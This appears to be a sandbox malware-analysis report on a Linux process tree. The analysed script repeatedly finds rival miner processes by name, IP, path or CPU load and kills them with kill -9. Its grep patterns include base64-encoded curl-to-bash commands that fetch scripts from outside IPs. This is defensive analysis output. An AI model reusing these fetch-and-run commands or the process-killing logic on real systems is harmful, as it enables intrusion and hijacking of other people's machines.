- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:1050
- /bin/grep
  grep -v grep
  2⤵
  PID:1049
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1052
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1048
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1058
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:1057
- /bin/grep
  grep -v grep
  2⤵
  PID:1056
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1059
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1055
- /bin/grep
  grep -v grep
  2⤵
  PID:1063
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1062
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1065
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:1064
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1066
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1071
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:1070
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1073
- /bin/grep
  grep -v grep
  2⤵
  PID:1069
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1068
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1078
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:1077
- /bin/grep
  grep -v grep
  2⤵
  PID:1076
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1079
- /bin/ps
  ps aux
  2⤵
  PID:1075
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1084
- /bin/grep
  grep HiPxCJRS
  2⤵
  PID:1083
- /bin/grep
  grep -v grep
  2⤵
  PID:1082
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1081
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1085
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1091
- /bin/grep
  grep http_0xCC030
  2⤵
  PID:1090
- /bin/grep
  grep -v grep
  2⤵
  PID:1089
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1092
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1088
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1097
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:1096
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1098
- /bin/grep
  grep -v grep
  2⤵
  PID:1095
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1094
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:1104
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1105
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1106
- /bin/grep
  grep -v grep
  2⤵
  PID:1103
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1102
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1112
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:1111
- /bin/grep
  grep -v grep
  2⤵
  PID:1110
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1113
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1109
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1121
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:1120
- /bin/grep
  grep -v grep
  2⤵
  PID:1119
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1122
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1118
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1127
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:1126
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1128
- /bin/grep
  grep -v grep
  2⤵
  PID:1125
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1124
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1133
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:1132
- /bin/grep
  grep -v grep
  2⤵
  PID:1131
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1130
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1140
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:1139
- /bin/grep
  grep -v grep
  2⤵
  PID:1138
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1141
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1137
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1145
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:1144
- /bin/grep
  grep -v grep
  2⤵
  PID:1143
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1146
- /bin/ps
  ps aux
  2⤵
  PID:1142
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1151
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:1150
- /bin/grep
  grep -v grep
  2⤵
  PID:1149
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1152
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1148
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1156
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:1155
- /bin/grep
  grep -v grep
  2⤵
  PID:1154
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1157
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1153
- /bin/grep
  grep nqscheduler
  2⤵
  PID:1161
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1162
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1163
- /bin/grep
  grep -v grep
  2⤵
  PID:1160
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1159
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:1166
- /bin/grep
  grep -v grep
  2⤵
  PID:1165
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1164
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1168
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1167
- /bin/grep
  grep "]"
  2⤵
  PID:1172
- /bin/grep
  grep -v aux
  2⤵
  PID:1171
- /bin/grep
  grep -v grep
  2⤵
  PID:1170
- /bin/ps
  ps aux
  2⤵
  PID:1169
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:1173
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1174
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1178
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:1177
- /bin/grep
  grep -v grep
  2⤵
  PID:1176
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1175
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1179
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1183
- /bin/grep
  grep -v grep
  2⤵
  PID:1181
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:1182
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1184
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1180
- /bin/grep
  grep -v grep
  2⤵
  PID:1186
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1189
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:1187
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1185
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1188
- /bin/grep
  grep -v -
  2⤵
  PID:1193
- /bin/grep
  grep -v /
  2⤵
  PID:1192
- /bin/grep
  grep -v grep
  2⤵
  PID:1191
- /bin/grep
  grep -v _
  2⤵
  PID:1194
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1190
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:1195
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1196
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1200
- /bin/grep
  grep -v grep
  2⤵
  PID:1198
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1197
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1201
- /bin/grep
  grep "\\[^"
  2⤵
  PID:1199
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1202
- /bin/grep
  grep -v grep
  2⤵
  PID:1203
- /bin/grep
  grep rsync
  2⤵
  PID:1204
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1205
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1206
- /bin/grep
  grep watchd0g
  2⤵
  PID:1209
- /bin/grep
  grep -v grep
  2⤵
  PID:1208
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1210
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1211
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1207
- /bin/grep
  grep -v grep
  2⤵
  PID:1213
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1212
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1214
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1215
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1216
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1214
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1214
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1214
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1214
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1214
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1214
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  PID:1219
- /bin/grep
  grep -v grep
  2⤵
  PID:1218
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1220
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1217
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1221
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1224
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1225
- /bin/grep
  grep -v grep
  2⤵
  PID:1223
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1226
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1222
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1230
- /bin/grep
  grep gitee.com
  2⤵
  PID:1229
- /bin/grep
  grep -v grep
  2⤵
  PID:1228
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1231
- /bin/ps
  ps aux
  2⤵
  PID:1227
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1235
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1234
- /bin/grep
  grep -v grep
  2⤵
  PID:1233
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1236
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1232
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1240
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:1239
- /bin/grep
  grep -v grep
  2⤵
  PID:1238
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1241
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1237
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1245
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:1244
- /bin/grep
  grep -v grep
  2⤵
  PID:1243
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1242
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1246
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1250
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:1249
- /bin/grep
  grep -v grep
  2⤵
  PID:1248
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1251
- /bin/ps
  ps aux
  2⤵
  PID:1247
- /bin/grep
  grep kthrotlds
  2⤵
  PID:1254
- /bin/grep
  grep -v grep
  2⤵
  PID:1253
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1255
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1256
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1252
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1260
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:1259
- /bin/grep
  grep -v grep
  2⤵
  PID:1258
- /bin/ps
  ps aux
  2⤵
  PID:1257
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1261
- /bin/grep
  grep netdns
  2⤵
  PID:1264
- /bin/grep
  grep -v grep
  2⤵
  PID:1263
- /bin/ps
  ps aux
  2⤵
  PID:1262
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1265
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1266
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1271
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1267
- /bin/grep
  grep watchdogs
  2⤵
  PID:1269
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1270
- /bin/grep
  grep -v grep
  2⤵
  PID:1268
- /bin/grep
  grep -v root
  2⤵
  PID:1274
- /bin/grep
  grep -v grep
  2⤵
  PID:1273
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1272
- /bin/grep
  grep -v dblaunch
  2⤵
  PID:1275
- /bin/grep
  grep -v dblaunchs
  2⤵
  PID:1276
- /bin/grep
  grep -v dblaunched
  2⤵
  PID:1277
- /bin/grep
  grep -v apache2
  2⤵
  PID:1278
- /bin/grep
  grep -v atd
  2⤵
  PID:1279
- /bin/grep
  grep -v kdevtmpfsi
  2⤵
  PID:1280
- /usr/bin/awk
  awk "\$3>80.0{print \$2}"
  2⤵
  PID:1281
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1282
- /bin/grep
  grep -v grep
  2⤵
  PID:1284
- /bin/grep
  grep -v aux
  2⤵
  PID:1285
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1283
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1287
- /bin/grep
  grep " ps"
  2⤵
  PID:1286
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1288
- /bin/grep
  grep sync_supers
  2⤵
  PID:1292
- /bin/grep
  grep -v grep
  2⤵
  PID:1291
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1290
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1293
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1294
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1300
- /bin/grep
  grep cpuset
  2⤵
  PID:1299
- /bin/grep
  grep -v grep
  2⤵
  PID:1298
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1301
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1297
- /bin/grep
  grep -v grep
  2⤵
  PID:1303
- /bin/grep
  grep "x]"
  2⤵
  PID:1305
- /bin/grep
  grep -v aux
  2⤵
  PID:1304
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1306
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1302
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1307
- /bin/grep
  grep -v aux
  2⤵
  PID:1312
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1310
- /bin/grep
  grep "sh] <"
  2⤵
  PID:1313
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1314
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1315
- /bin/grep
  grep -v grep
  2⤵
  PID:1311
- /bin/grep
  grep -v aux
  2⤵
  PID:1319
- /bin/grep
  grep -v grep
  2⤵
  PID:1318
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1317
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1321
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1322
- /bin/grep
  grep " \\[]"
  2⤵
  PID:1320
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:1326
- /bin/grep
  grep -v grep
  2⤵
  PID:1325
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1324
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1327
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1328
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:1333
- /bin/grep
  grep -v grep
  2⤵
  PID:1332
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1331
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1335
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1334
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1339
- /bin/grep
  grep -v grep
  2⤵
  PID:1338
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1337
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1341
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1340
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1346
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:1345
- /bin/grep
  grep -v grep
  2⤵
  PID:1344
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1347
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1343
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1353
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:1352
- /bin/grep
  grep -v grep
  2⤵
  PID:1351
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1354
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1350
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:1359
- /bin/grep
  grep -v grep
  2⤵
  PID:1358
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1357
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1360
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1361
- /bin/grep
  grep -v grep
  2⤵
  PID:1363
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:1364
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1362
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1365
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1366
- /bin/grep
  grep -v grep
  2⤵
  PID:1370
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1369
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:1371
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1372
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1373
- /bin/ps
  ps aux
  2⤵
  PID:1375
- /bin/grep
  grep -v grep
  2⤵
  PID:1376
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:1378
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1379
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1380
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1384
- /bin/grep
  grep sustse
  2⤵
  PID:1383
- /bin/grep
  grep -v grep
  2⤵
  PID:1382
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1385
- /bin/ps
  ps aux
  2⤵
  PID:1381
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1391
- /bin/grep
  grep sustse3
  2⤵
  PID:1390
- /bin/grep
  grep -v grep
  2⤵
  PID:1389
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1392
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1388
- /bin/grep
  grep wget
  2⤵
  PID:1397
- /bin/grep
  grep mr.sh
  2⤵
  PID:1396
- /bin/grep
  grep -v grep
  2⤵
  PID:1395
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1399
- /bin/ps
  ps aux
  2⤵
  PID:1394
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1400
- /bin/grep
  grep mr.sh
  2⤵
  PID:1403
- /bin/grep
  grep curl
  2⤵
  PID:1404
- /bin/grep
  grep -v grep
  2⤵
  PID:1402
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1405
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1401
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1406
- /bin/grep
  grep wget
  2⤵
  PID:1412
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:1411
- /bin/grep
  grep -v grep
  2⤵
  PID:1410
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1409
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1413
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1414
- /bin/grep
  grep curl
  2⤵
  PID:1420
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:1419
- /bin/grep
  grep -v grep
  2⤵
  PID:1418
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1421
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1417
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1422

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/log_rot

Filesize
5B

MD5
727479ef7cedf30c03459bec7d87b0f0

SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41

SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads